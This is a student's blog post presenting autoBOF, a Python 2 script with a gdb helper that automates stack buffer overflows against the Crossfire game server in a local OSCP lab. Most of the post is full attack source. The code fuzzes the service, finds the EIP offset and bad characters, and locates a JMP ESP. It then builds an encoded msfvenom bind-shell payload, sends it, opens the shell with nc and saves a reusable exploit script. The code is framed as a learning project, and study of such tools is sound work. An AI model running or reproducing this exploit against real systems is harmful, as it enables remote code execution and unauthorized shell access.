TL;DR I wrote a program to automate buffer overflows. I talk about what buffer overflows are, why I made this program, and show all the code I used.

In 11 days from now, it will have been a year since I first started on my journey of becoming an Offensive Security Certified Professional. In 15 days from now, it will have been a year since the lowest point in my infosec journey. I was feeling very discouraged and out of my depth. During the 4 days in between, I had been breezing through the material - covering multiple sections of coursework in a day. But when I got to the buffer overflow section of the learning material, and it just did not click with me. I failed over and over again for 3 straight days to grasp the material. I began to wonder if I had tried to do too much, too fast and wasn’t sure if I was in over my head or not. I stayed up late that third day, trying to get back on track, and I finally exploited the practice server Offsec provided me. I was ecstatic! And for the most part, I moved on to the next part of my coursework, filing away that new knowledge for the time being. But those three days planted a small seed of pure vengeance in my heart. “Screw buffer overflows!”, the seed said. “You should make it so no one ever has to make these again!”.

As it would turn out, my university wanted me to make something before they’d let me graduate. As long as my advisor deemed it sufficiently complex of a task, I could make whatever my heart desired. As previously stated, my heart desired vengeance (being very fertile soil for such things). Fortunately my advisor thought the idea was interesting and gave me the go-ahead. My first step was to create a design document, outlining the intended functionality of my little project and what it’d look like at each stage. I dreamed very big. The original intention for autoBOF was cross-platform with support for integrating multiple different debuggers in the process. In fact, it was also intended to be a tool used remotely - a thin client that would connect to a remote laboratory environment. It would be a masterpiece, a sword crafted to slay the tedious monster of my past.

None of that happened of course, and the tool ended up being about 500 lines of poorly optimized python that can only run on a local (Linux) laboratory environment. It’s wonky, takes about a minute to run in a best-case scenario, and doesn’t perform anywhere near as well as I originally expected it to. But it works. At least, it works against the crossfire application included in my PWK Kali VM. I do not have the illusion that my code is of any particular quality. In fact, if my professors actually looked at the code I’m about to show you, they may take away the CS degree I expect to receive next month.

Despite having said all of that, this took a lot of effort to make on my part, mostly during the hours of 10PM and 3AM before my weekly progress reports, as well as 0 to 3 random afternoons of any given week. There were also a couple occasions where I over promised what I would accomplish during a given period of time and had to frantically work to make up the difference. It seemed that every time I tried to take something I knew how to do manually and have my program do it automatically, I ran into some difficult (to me) problem to solve that I never anticipated beforehand. Because the tasks required for this program had an extremely minimal overlap with my formal education in programming, I had to break new ground whenever I wanted to do anything. Did I mention this is the first python program I’ve written? Anyway, let’s briefly discuss how these kinds of buffer overflows work and then get to the code.

The kind of buffer overflow autoBOF intends to exploit is a very basic kind of overflow. Say there is a server somewhere, that accepts data and stores it in a variable somewhere. Kind of a stretch, but bear with me. And then let’s assume that this server stores this data in variables of a fixed length. What happens if the server lets you send it more data than it can store? What does it do with the extra data? In our ideal case, it just puts it in adjacent memory space, overwriting some other poor sap’s data. And if we can write to system memory… can’t we tell the server to do things it’s not supposed to? That’s the plan! Our general approach is:

Fuzz the target server. Does it crash when we send lots of data? If the server crashes, we may have done something! Let’s find out exactly how much data it takes to crash the server. We discover that the server crashes when we send X bytes, and the register that directs program execution is overwritten at Y bytes. So we can execute X - Y bytes of code. Hurray! Sometimes, certain values aren’t processed by the server the way we want them to be processed. Let’s send every relevant value to the server and see if they come out the way we want them to. If not, those values are ‘bad’ and of an undiscerning character. So we call them ‘bad characters’. Or some reason like that. Next, we need to find a JMP instruction to hijack. We need to tell the program to jump to the payload we make and execute it. Lastly, if there’s enough space between X and Y to fit our whole payload, we generate one and send it in! If there isn’t enough space, we can put the payload inside our buffer (before Y bytes of data), and hope that we have enough space in the payload space to say ‘Jump to the payload at the start of the buffer’.

Note: Please forgive me for any improper indentations. I had to change leading spaces to and may have missed some. You can find the original code at https://github.com/DiscipleOfDust/autoBOF

#!/usr/bin/python # -*- coding: utf-8 -*- import socket, sys import os import time #make fuzzing more robust (sticky note) if(sys.argv[1] == "-help" or sys.argv[1] == "-h"): #consider two modes - one with user input, and the other with command line logic print "Usage: python autoBOF.py -start [initial data sequence including spaces] -end [any post-payload data sequence including spaces] -l [minimum buffer length] [maximum buffer length] -i [number of bytes to increment buffer by for each attempt] -target [remote IP] [remote port] -local [local IP] [shell port] -p [maximum attempts at payload generation] -n [name of exploit] -s [verbose by default, include to minimize stdout]



Example: python autoBOF.py -start \"x11(setup sound \" -end \"x90x00#\" -l 4368 4400 -i 1 -target 127.0.0.1 13327 -local 127.0.0.1 1337 -p 5 -n overflow.py

Alternatively, type \"python autoBOF.py -config /path/to/file.txt\" to use a configuration file instead" print "--------------------------------------------------------------------------------------------------" print "Config file format example:

start: \x11(setup sound

end:\x90\x00#

lengthMin: 4368

lengthMax: 4400

increment: 1

targetIP: 127.0.0.1

targetPort: 13327

localIP: 127.0.0.1

shellPort: 1337

payloadAttempts: 5

exploitName: autoExploit.py

silent: False" print "--------------------------------------------------------------------------------------------------" print "IMPORTANT: Requires partner script, restart.py to be running in tandem. Usage for restart.py: Move file to directory containing vulnerable service binary and type \"gdb -q -x restart.py [service name]\"" sys.exit() #init vals curVal = 0 argStart = 'autoBOF' #AutoBOF is uninit value for input checking argEnd = 'autoBOF' argLengthMin = 'autoBOF' argLengthMax = 'autoBOF' argIncrement = 'autoBOF' argTargetIP = 'autoBOF' argTargetPort = 'autoBOF' argLocalIP = 'autoBOF' argShellport = 'autoBOF' argPayloadAttempts = 'autoBOF' argExploitName = 'autoBOF' argSilent = False if(sys.argv[1] != "-config"): for x in sys.argv: curVal = curVal + 1 if (x == "-start"): argStart = sys.argv[curVal] #Consider escaping these like below argStart = argStart.decode('string_escape') elif(x == "-end"): argEnd = sys.argv[curVal] argEnd = argEnd.decode('string_escape') elif(x == "-l"): argLengthMin = sys.argv[curVal] argLengthMax = sys.argv[curVal+1] elif(x == "-i"): argIncrement = sys.argv[curVal] elif(x == "-target"): argTargetIP = sys.argv[curVal] argTargetPort = sys.argv[curVal+1] elif(x == "-local"): argLocalIP = sys.argv[curVal] argShellPort = sys.argv[curVal+1] elif(x == "-p"): argPayloadAttempts = sys.argv[curVal] elif(x == "-n"): argExploitName = sys.argv[curVal] elif(x == "-s"): argSilent = True else: fileName = sys.argv[2] bufFile = open(fileName,"r") configFile = bufFile.read() configFile = configFile.split('

') #newlines are common bad character, so not being able to parse them in config files isn't the worst thing in the world. tempIndex = configFile[0].find(':') argStart = configFile[0][tempIndex+2:] argStart = argStart.decode('string_escape') tempIndex = configFile[1].find(':') argEnd = configFile[1][tempIndex+2:] argEnd = argEnd.decode('string_escape') tempIndex = configFile[2].find(':') argLengthMin = configFile[2][tempIndex+2:] tempIndex = configFile[3].find(':') argLengthMax = configFile[3][tempIndex+2:] tempIndex = configFile[4].find(':') argIncrement = configFile[4][tempIndex+2:] tempIndex = configFile[5].find(':') argTargetIP = configFile[5][tempIndex+2:] tempIndex = configFile[6].find(':') argTargetPort = configFile[6][tempIndex+2:] tempIndex = configFile[7].find(':') argLocalIP = configFile[7][tempIndex+2:] tempIndex = configFile[8].find(':') argShellPort = configFile[8][tempIndex+2:] tempIndex = configFile[9].find(':') argPayloadAttempts = configFile[9][tempIndex+2:] tempIndex = configFile[10].find(':') argExploitName = configFile[10][tempIndex+2:] tempIndex = configFile[11].find(':') argSilent = configFile[11][tempIndex+2:] if (argSilent == "True"): argSilent = True else: argSilent = False #Check the arguments for proper initialization if(argStart == 'autoBOF'): print 'ERROR: uninitialized start argument. Try autoBOF.py -h for more details' sys.exit() if(argEnd == 'autoBOF'): print 'ERROR: uninitialized end argument. Try autoBOF.py -h for more details' sys.exit() if(argLengthMin == 'autoBOF' or argLengthMin.isdigit() == False): print 'ERROR: uninitialized or invalid minimum buffer length argument. Try autoBOF.py -h for more details' sys.exit() if(argLengthMax == 'autoBOF' or argLengthMax.isdigit() == False): print 'ERROR: uninitialized or invalid maximum buffer length argument. Try autoBOF.py -h for more details' sys.exit() if(argIncrement == 'autoBOF' or argIncrement.isdigit() == False): print 'ERROR: uninitialized or invalid buffer length increment argument. Try autoBOF.py -h for more details' sys.exit() if(argTargetIP == 'autoBOF'): print 'ERROR: uninitialized Target IP argument. Try autoBOF.py -h for more details' sys.exit() if(argTargetPort == 'autoBOF' or argTargetPort.isdigit() == False): print 'ERROR: uninitialized or invalidTarget Port argument. Try autoBOF.py -h for more details' sys.exit() if(argLocalIP == 'autoBOF'): print 'ERROR: uninitialized Local IP argument. Try autoBOF.py -h for more details' sys.exit() if(argShellPort == 'autoBOF' or argShellPort.isdigit() == False): print 'ERROR: uninitialized Shell Port argument. Try autoBOF.py -h for more details' sys.exit() if(argPayloadAttempts == 'autoBOF' or argPayloadAttempts.isdigit() == False): print 'Warning: Unitialized number of payload attemps. Will be set to 3. Try autoBOF.py -h for more details' argPayloadAttempts = 3 if(argExploitName == 'autoBOF'): print 'ERROR: uninitialized Exploit Name argument. Try autoBOF.py -h for more details' sys.exit() if(len(argExploitName) < 3): print 'ERROR: Exploit name must be at least three characters long' sys.exit()

Alright, so here we have how the user interacts with the program. They can either make a configuration file (my recommendation) which contains all the necessary specifications for the program to execute, or they can use flags if they are so inclined. I found there to be so many flags that I never actually tested whether or not that functionality worked. I ran into some encoding issues that made me try to configuration file as a solution, and when I solved that problem (which turned out to be completely unrelated to the input method), I slapped the same solution onto the flag parsing, but since I never tested that it may be completely broken.

You may also notice a lack of shell customization (Never got around to implementing shell customization. It might have taken half an hour, it might have taken a day). Hopefully bind shells are okay. I also hope that your service doesn’t require one of the variables to be ‘autoBOF’ for some reason, because then my program wouldn’t work at all. Of particular note here are my half assed type checking and some random comments I don’t remember making and could have sworn I removed from the code for being irrelevant or nonsensical.

#Start program execution if(not argSilent): os.system("figlet autoBOF") #Optional but very important dependency host = argTargetIP port = int(argTargetPort) buffer = ('\x41') start = argStart end = argEnd isSuccess = False overflow = buffer tryUntil = int(argLengthMax) startCount = int(argLengthMin) increment = int(argIncrement) if(not argSilent): print "---- Attempting to Crash Service ----" while(startCount < tryUntil and isSuccess == False): try: s = socket.socket() s.connect((host, port)) data = s.recv(1024) startCount = startCount + increment if(not argSilent): print "fuzzing at", startCount, "bytes", "out of", tryUntil overflow = start + (buffer * startCount) + end s.send(overflow) s.close() time.sleep(.6) bufFile = open("/usr/games/crossfire/bin/eip.txt", "r") eipValue = bufFile.read() if("0x41414141" in eipValue): if(not argSilent): print "---- Service Crashed With EIP overwrite ----" print "!! Overflow at",startCount,"bytes" isSuccess = True except socket.error, e: bufFile = open("/usr/games/crossfire/bin/eip.txt", "r") eipValue = bufFile.read() if("0x41414141" in eipValue): if(not argSilent): print "---- Service Crashed With EIP overwrite ----" print "!! Overflow at",startCount,"bytes" isSuccess = True break if(not isSuccess): if(not argSilent): print "---- Service is Resilient ----" print("No overflow up to"),tryUntil,"bytes" sys.exit() #END OVERFLOW DETECTION

I hope you like the code you see above because I copy and paste it a lot instead of reusing it in a method like a practical, efficient programmer. Here the program sends a sequence of A’s to the service inside a user-specified wrapper. The debugger script I wrote (which will be shown later) dumps the eip register whenever the targeted service crashes. The code will loop until it reaches the user specified limit or until the EIP register is overwritten with A’s. If it is, we can continue searching for our buffer overflow! If A is a bad character we’ll be in a bit of trouble, though. Anyway, one of the problems I had with this section of code was trying to figure out the optimal way to fuzz a service. Some of these overflows only happen at extremely specific amounts of data, and a difference of one byte could make or break the exploit. As a result, I decided to leave it entirely up to the user and thus absolve myself of that responsibility. By that I mean to say I’m empowering the users by maximizing the customization potential of my software.

if(not argSilent): print("--- Generating Unique Buffer ---") bashCommand = "/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l " strTest = str(startCount) bashCommand = bashCommand + strTest + " > offsetStr.txt" os.system(bashCommand) bufFile = open("offsetStr.txt", "r") newBuffer = bufFile.read() newBuffer = newBuffer.strip('

') newBuffer = start + newBuffer + end s = socket.socket() s.connect((host, port)) s.send(newBuffer) bufFile = open("/usr/games/crossfire/bin/eip.txt", "r") eipValue = bufFile.read() if(not argSilent): print("Unique Buffer Sent") print("--- Attempting EIP overwrite ---") bashCommand = "rm offsetStr.txt" os.system(bashCommand) s.close() time.sleep(.6) bufFile = open("/usr/games/crossfire/bin/eip.txt", "r") eipValue = bufFile.read() startValue = eipValue.find("0x") eipValue = eipValue[startValue:(startValue+10)] if(not argSilent): print ("EIP overwrite successful") bashCommand = "/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l " + strTest + " -q " + eipValue os.system(bashCommand + " > offset.txt") bufFile = open("offset.txt") offset = bufFile.read() startValue = offset.find("offset")+7 offset = offset[startValue:] offset = offset.strip('

') offset = int(offset) shellSpace = startCount - offset if(not argSilent): print "Offset is at", offset, "bytes with", (shellSpace), "bytes of post-offset shellcode space"

The above code is very straightforward - I call Metasploit’s pattern creation and offset tools to add a custom string to the buffer in order to determine exactly where the overwrite takes place. This lets me know how much space I have to work with to place shellcode. I am again aided by my lovely debugger script.

########## Bad Character Phase ########## print '--- Bad Character Detection Phase ---' #removed 00, 0A, OD, FF as common bad characters badchars_hex = ["\x00", "\x0a", "\x0d", "\xff"] badchars_text = ["00","0a","0d","ff"] allchars_hex = ["\x01","\x02","\x03","\x04","\x05","\x06","\x07","\x08","\x09","\x0b","\x0c","\x0e","\x0f","\x10","\x11","\x12","\x13","\x14","\x15","\x16","\x17","\x18","\x19","\x1a","\x1b","\x1c","\x1d","\x1e","\x1f","\x20","\x21","\x22","\x23","\x24","\x25","\x26","\x27","\x28","\x29","\x2a","\x2b","\x2c","\x2d","\x2e","\x2f","\x30","\x31","\x32","\x33","\x34","\x35","\x36","\x37","\x38","\x39","\x3a","\x3b","\x3c","\x3d","\x3e","\x3f","\x40","\x41","\x42","\x43","\x44","\x45","\x46","\x47","\x48","\x49","\x4a","\x4b","\x4c","\x4d","\x4e","\x4f","\x50","\x51","\x52","\x53","\x54","\x55","\x56","\x57","\x58","\x59","\x5a","\x5b","\x5c","\x5d","\x5e","\x5f","\x60","\x61","\x62","\x63","\x64","\x65","\x66","\x67","\x68","\x69","\x6a","\x6b","\x6c","\x6d","\x6e","\x6f","\x70","\x71","\x72","\x73","\x74","\x75","\x76","\x77","\x78","\x79","\x7a","\x7b","\x7c","\x7d","\x7e","\x7f","\x80","\x81","\x82","\x83","\x84","\x85","\x86","\x87","\x88","\x89","\x8a","\x8b","\x8c","\x8d","\x8e","\x8f","\x90","\x91","\x92","\x93","\x94","\x95","\x96","\x97","\x98","\x99","\x9a","\x9b","\x9c","\x9d","\x9e","\x9f","\xa0","\xa1","\xa2","\xa3","\xa4","\xa5","\xa6","\xa7","\xa8","\xa9","\xaa","\xab","\xac","\xad","\xae","\xaf","\xb0","\xb1","\xb2","\xb3","\xb4","\xb5","\xb6","\xb7","\xb8","\xb9","\xba","\xbb","\xbc","\xbd","\xbe","\xbf","\xc0","\xc1","\xc2","\xc3","\xc4","\xc5","\xc6","\xc7","\xc8","\xc9","\xca","\xcb","\xcc","\xcd","\xce","\xcf","\xd0","\xd1","\xd2","\xd3","\xd4","\xd5","\xd6","\xd7","\xd8","\xd9","\xda","\xdb","\xdc","\xdd","\xde","\xdf","\xe0","\xe1","\xe2","\xe3","\xe4","\xe5","\xe6","\xe7","\xe8","\xe9","\xea","\xeb","\xec","\xed","\xee","\xef","\xf0","\xf1","\xf2","\xf3","\xf4","\xf5","\xf6","\xf7","\xf8","\xf9","\xfa","\xfb","\xfc","\xfd","\xfe"] allchars_text = ["01","02","03","04","05","06","07","08","09","0b","0c","0e","0f","10","11","12","13","14","15","16","17","18","19","1a","1b","1c","1d","1e","1f","20","21","22","23","24","25","26","27","28","29","2a","2b","2c","2d","2e","2f","30","31","32","33","34","35","36","37","38","39","3a","3b","3c","3d","3e","3f","40","41","42","43","44","45","46","47","48","49","4a","4b","4c","4d","4e","4f","50","51","52","53","54","55","56","57","58","59","5a","5b","5c","5d","5e","5f","60","61","62","63","64","65","66","67","68","69","6a","6b","6c","6d","6e","6f","70","71","72","73","74","75","76","77","78","79","7a","7b","7c","7d","7e","7f","80","81","82","83","84","85","86","87","88","89","8a","8b","8c","8d","8e","8f","90","91","92","93","94","95","96","97","98","99","9a","9b","9c","9d","9e","9f","a0","a1","a2","a3","a4","a5","a6","a7","a8","a9","aa","ab","ac","ad","ae","af","b0","b1","b2","b3","b4","b5","b6","b7","b8","b9","ba","bb","bc","bd","be","bf","c0","c1","c2","c3","c4","c5","c6","c7","c8","c9","ca","cb","cc","cd","ce","cf","d0","d1","d2","d3","d4","d5","d6","d7","d8","d9","da","db","dc","dd","de","df","e0","e1","e2","e3","e4","e5","e6","e7","e8","e9","ea","eb","ec","ed","ee","ef","f0","f1","f2","f3","f4","f5","f6","f7","f8","f9","fa","fb","fc","fd","fe"] bufCount = 0 allchars_unsure_hex = [] allchars_unsure_text = [] while(len(allchars_hex) > 4): section_hex = allchars_hex[3] + allchars_hex[2] + allchars_hex[1] + allchars_hex[0] section_text = allchars_text[0] + allchars_text[1] + allchars_text[2] + allchars_text[3] bufCount = bufCount + 1 section_text = section_text.replace("\\", "") section_text = section_text.replace("x", "") section_text = "0x" + section_text if(not argSilent): print section_text, "Section being searched for in memory" newBuffer = start + "BBBB" + section_hex + ("\x41" * (offset-8)) + "CCCC" + (shellSpace * "/x41") + end s = socket.socket() s.connect((host, port)) s.send(newBuffer) time.sleep(.6) bufFile = open("/usr/games/crossfire/bin/badchars.txt", "r") badData = bufFile.read() firstEggLocation = badData.find("0x42424242") + 11 lastEggLocation = badData.find("0x41414141") badData = badData[firstEggLocation:lastEggLocation] if(not argSilent): print "-----stack------" print badData print "------------------" if(section_text in badData): allchars_text = allchars_text[4:] allchars_hex = allchars_hex[4:] continue else: if(not argSilent): print "BAD CHARACTER DETECTED IN ", section_text #move to unsure variabless allchars_unsure_text = allchars_unsure_text + allchars_text[:4] allchars_unsure_hex = allchars_unsure_hex + allchars_hex[:4] allchars_text = allchars_text[4:] allchars_hex = allchars_hex[4:] allchars_unsure_hex = allchars_unsure_hex + allchars_hex allchars_unsure_text = allchars_unsure_text + allchars_text if(not argSilent): print "unsure values are", allchars_unsure_text print "---Verifying Bad Characters ---" #Final Badchar Verification Phase while(len(allchars_unsure_hex) > 0): section_hex = "\x41" + "\x41" + "\x41" + allchars_unsure_hex[0] section_text = allchars_unsure_text[0] + "414141" section_text = section_text.replace("\\", "") section_text = section_text.replace("x", "") section_text = "0x" + section_text if(not argSilent): print section_text, "Section being searched for in memory" newBuffer = start + "BBBB" + section_hex + ("\x41" * (offset-8)) + "CCCC" + (shellSpace * "/x41") + end s = socket.socket() s.connect((host, port)) s.send(newBuffer) time.sleep(.6) bufFile = open("/usr/games/crossfire/bin/badchars.txt", "r") badData = bufFile.read() firstEggLocation = badData.find("0x42424242") + 11 lastEggLocation = badData.find("0x41414141") badData = badData[firstEggLocation:lastEggLocation] if(not argSilent): print "-----stack------" print badData print "------------------" if(section_text in badData): allchars_unsure_hex = allchars_unsure_hex[1:] allchars_unsure_text = allchars_unsure_text[1:] else: if(not argSilent): print "BADCHAR VERIFIED:", allchars_unsure_text[0] badchars_hex.append(allchars_unsure_hex[0]) badchars_text.append(allchars_unsure_text[0]) allchars_unsure_hex = allchars_unsure_hex[1:] allchars_unsure_text = allchars_unsure_text[1:] continue if(not argSilent): print "Badchar Detection Complete!" print "Bad Characters:", badchars_text print "Acquiring JMP ESP..."

This was one of the hardest parts of the program for me to make, as I had no idea whatsoever how to dump and access the relevant memory with gdb. I take a list of every possible ascii character value in hex, and send them in groups of 4 to the service to see if they display properly in memory. If they do, great! If not, one of those 4 characters is a ‘bad character’ and needs to be avoided when I generate my payload. So I add all 4 characters to an array of possible bad characters (since I don’t know which character is the bad one), whenever the expected character sequence fails to appear in memory.

I then do another pass at the service with the allchars_unsure array as my value library, sending each byte in a sequence paired with 3 A’s. Since my program operates under the assumption that A’s are valid characters, I know exactly what to look for. I found this to be a good compromise to approaching this problem, as one bad character can corrupt all of the output after it. I found groups of 4 bytes to be the most convenient to look for and parse with my debugger script, and that’s what I went with. This is probably also where my project falls the farthest from its goal of being an automated buffer overflow generator, since it’s possible a bad character could be invalid but display correctly in memory, and only corrupt the rest of the sequence. In this case, my program would fail to detect 1 out of every 4 such bad characters at a minimum.

bufFile = open("/usr/games/crossfire/bin/jmpSearch.txt", "r") jmpData = bufFile.read() jmpData = '

'.join(jmpData.split('

')[1:]) offset1 = jmpData[8:10].decode("hex") offset2 = jmpData[6:8].decode("hex") offset3 = jmpData[4:6].decode("hex") offset4 = jmpData[2:4].decode("hex") eipString = offset1 + offset2 + offset3 + offset4 badlist = "" while (len(badchars_text) > 0): badlist = badlist + badchars_text[0] badchars_text.pop(0) badlist = "\\x" + badlist[0:2] + "\\x" + badlist[2:4] + "\\x" + badlist[4:6] + "\\x" + badlist[6:8] argPayloadAttempts = int(argPayloadAttempts) bashCommand = "msfvenom -p linux/x86/shell_bind_tcp LPORT=" + argShellPort + " -f raw -b \"" + badlist + "\" -e x86/shikata_ga_nai -o shellcode.txt" #Payload JMP Offset Detection Phase eaxLength = len(start)-2 jmpEAXCommand = "(echo \"add eax, "+ str(eaxLength) + "\") | exec /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb > eaxHelp.txt 2>/dev/null" os.system(jmpEAXCommand) bufFile = open("eaxHelp.txt") eaxValue = bufFile.read() eaxValue = eaxValue.replace("nasm","") eaxValue = eaxValue.replace(" 00000000 ","") eaxValue = eaxValue.replace("add eax,byte +0xc","") eaxValue = eaxValue.replace(" ","") eaxValue = eaxValue.replace("

","") eaxValue = eaxValue.replace(">"," ") eaxValue = eaxValue[9:] eaxLength2 = len(eaxValue) eaxValue = eaxValue[:eaxLength2-9] eaxLength2 = len(eaxValue) retString = "" control = 0 while(eaxLength2 > 0): retString = retString + "\\x" + eaxValue[control:control+2] eaxLength2 = eaxLength2-2 control = control + 2 retString = retString.lower() oldString = retString retString = retString.decode("string_escape")

My debugger script has helpfully created a file that contains a valid JMP ESP for us to hijack. So we use that, as well as the other information we’ve gathered so far, in order to create a bash command that will generate a payload. Additionally, since the service I was testing this code against only had 11 bytes of post-offset shellcode space, I decided to have the program assume there will never be enough space after the offset value to insert a payload, and to instead put the payload at the beginning of the buffer, and assume that there will be enough space after the offset to include a JMP instruction to redirect execution to that location. I use another one of Metasploit’s tools for this, albeit very messily.

if(not argSilent): print "--- Building Payload ---" os.system(bashCommand) bufFile = open("shellcode.txt", "r") shellcode = bufFile.read() newBuffer = start + shellcode + ("\x41" * (offset-len(shellcode))) + eipString + retString + ("\xff\xe0\x90\x90") + end #the hardcoded values tell the program to jump to the prior variable value if(not argSilent): print "----------------------" print "Deploying Payload..." s = socket.socket() s.connect((host, port)) s.send(newBuffer) if(not argSilent): print("--- Initiating Bind Shell Connection ---") time.sleep(.6) output = os.system("nc -v "+argLocalIP+" "+argShellPort) if(output == 0 or output == 2): argPayloadAttempts = 0 payloadSuccess = True else: print "Connection Failure!" argPayloadAttempts = argPayloadAttempts - 1 if(not payloadSuccess): if(not argSilent): print "Payload Deployment Failed. Exiting program" sys.exit()

This is the (most) fun part! We try to build a payload, deploy it, and catch a shell. We try this a user specified number of times, using the same copy-pasted socket code as always.

###Build PayloadFile#### os.system("mv shellcode.txt " + argExploitName[0:3] +"Shellcode.txt") shebang = "#!/usr/bin/python" load = "import socket, os, time" output = "output = 256" outText = "print \"--- Spawning Shell ---\"" host = "host = \"" + str(argTargetIP) + "\"" port = "port = " + str(argTargetPort) fileStart = "start = \"" + argStart.encode("string_escape") + "\"" fileEnd = "end = \"" + argEnd.encode("string_escape") + "\"" valOverwrite = "eipString = \"" + eipString.encode("string_escape") + "\"" jmpEax = "jmpEax = \"" + oldString + "\xff\xe0\x90\x90\"".encode("string_escape") bufOne = "bufFile = open(\"" + argExploitName[0:3] + "Shellcode.txt" + "\", \"r\")" bufTwo = "shellcode = bufFile.read()" flow = "flow = \"A\" * " + str(offset-len(shellcode)) code = "buffer = (start + shellcode + flow + eipString + jmpEax + end)" loopMe = "while(output == 256):" networking1 = "s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)" networking2 = "s.connect((host, port))" networking3 = "s.send(buffer)" networking4 = "os.system(\"nc -v " + str(argTargetIP) + " " + str(argShellPort) + " 2>/dev/null\")" #TODO change argShellPort to a more logical name, like argShellPort ductTape = "time.sleep(.6)" fullExploit = shebang + "

" + load + "

" + output + "

" + host + "

" + port + "

" + fileStart + "

" + flow + "

" + fileEnd + "

" + valOverwrite + "

" + jmpEax + "

" + bufOne + "

" + bufTwo + "

" + code + "

" + outText + "

" + loopMe + "

" + networking1 + "

" + networking2 + "

" + networking3 + "

" + ductTape + "

" + networking4 + "

" savedExploit = open(argExploitName, "w") savedExploit.write(fullExploit) savedExploit.close() if(not argSilent): print "----------------------" print "Exploit saved as " + argExploitName + ", please keep in the same directory as " + (argExploitName[0:3] + "Shellcode.txt") os.system("rm eaxHelp.txt") os.system("rm offset.txt")

We now save a very bad replica of this exploit we just made for later use. The buffer stays in a special file of its own because I couldn’t figure out how to properly write it to a single a file without encoding issues that cause the exploit to fail. Additionally, even though it should theoretically work on the first try (given we’re using the exact same buffer that worked before), it sometimes takes upwards of a minute’s worth of attempts to successfully exploit the service. I have no idea why. Maybe address space layout randomization, even though I thought I disabled that in my environment? Who knows! Also we delete a few temporary files we don’t need anymore and exit.

#!gdb import sys import gdb import os os.system("echo resetFile > eip.txt") number_restarts = 100 gdb.execute("set pagination off") os.system("/usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/rex-bin_tools-0.1.4/bin/msfelfscan -j esp ./crossfire > jmpSearch.txt") def on_stop(sig): global number_restarts if isinstance(sig, gdb.SignalEvent): if (number_restarts > 0): os.system("rm eip.txt") gdb.execute("set confirm off") gdb.execute("set logging file eip.txt") gdb.execute("set logging on") gdb.execute("set logging overwrite on") gdb.execute("info registers eip") gdb.execute("set logging off") gdb.execute("set logging file badchars.txt") gdb.execute("set logging on") gdb.execute("x/500xw $esp") gdb.execute("set logging overwrite off") gdb.execute("set logging off") gdb.execute("kill") gdb.execute("run") gdb.events.stop.connect (on_stop) gdb.execute("run")

Lastly, we have my debugger script. On startup, it wipes anything from past exploit attempts and dumps a list of hijackable ESP’s for the main program to use. Additionally, whenever the program crashes for any reason whatsoever, it dumps the EIP registry and 500 lines of stack memory for usage by my main program.

That’s pretty much it. You’re welcome to adapt or use this code for your own purposes, if you think it has any value. I’m reasonably confident I could emulate the restart script with mona and have it work with immunity debugger, and thus be cross platform. In such a case, this tool may be functional (with some work) on the OSCP exam. I’m not sure whether or not it would be allowed though, since then you wouldn’t actually have to know what you’re doing in order to pass that portion of the test. That being said, given my poor programming ability (and the scarcity of these exploits in the wild), it would also be reasonable to assume there isn’t much value to my project outside of it being a wonderful learning experience for me. If anyone has any questions, I will add them to my Q&A, and please feel free to ask whatever comes to mind.

Here’s a screenshot of my program in action: https://i.imgur.com/POnukSS.png

Q&A

Q: Why did you write this in Python 2.7?

A: I didn’t actually know I wasn’t using the latest version of python until I had already committed to writing it in 2.7, which was the default version of python on my Linux distro. If Backbox/Kali used 3.0 by default this would have been written in that.

Q: What are those ugly sleep statements for? Why do your scripts communicate by reading and writing to local files?

A: I’m kind of self conscious about this because I’m pretty sure it’s a garbage way to solve this problem, but when I was trying to figure out how to have my scripts interact with each other at all this was the first thing I thought of and it’s what I did.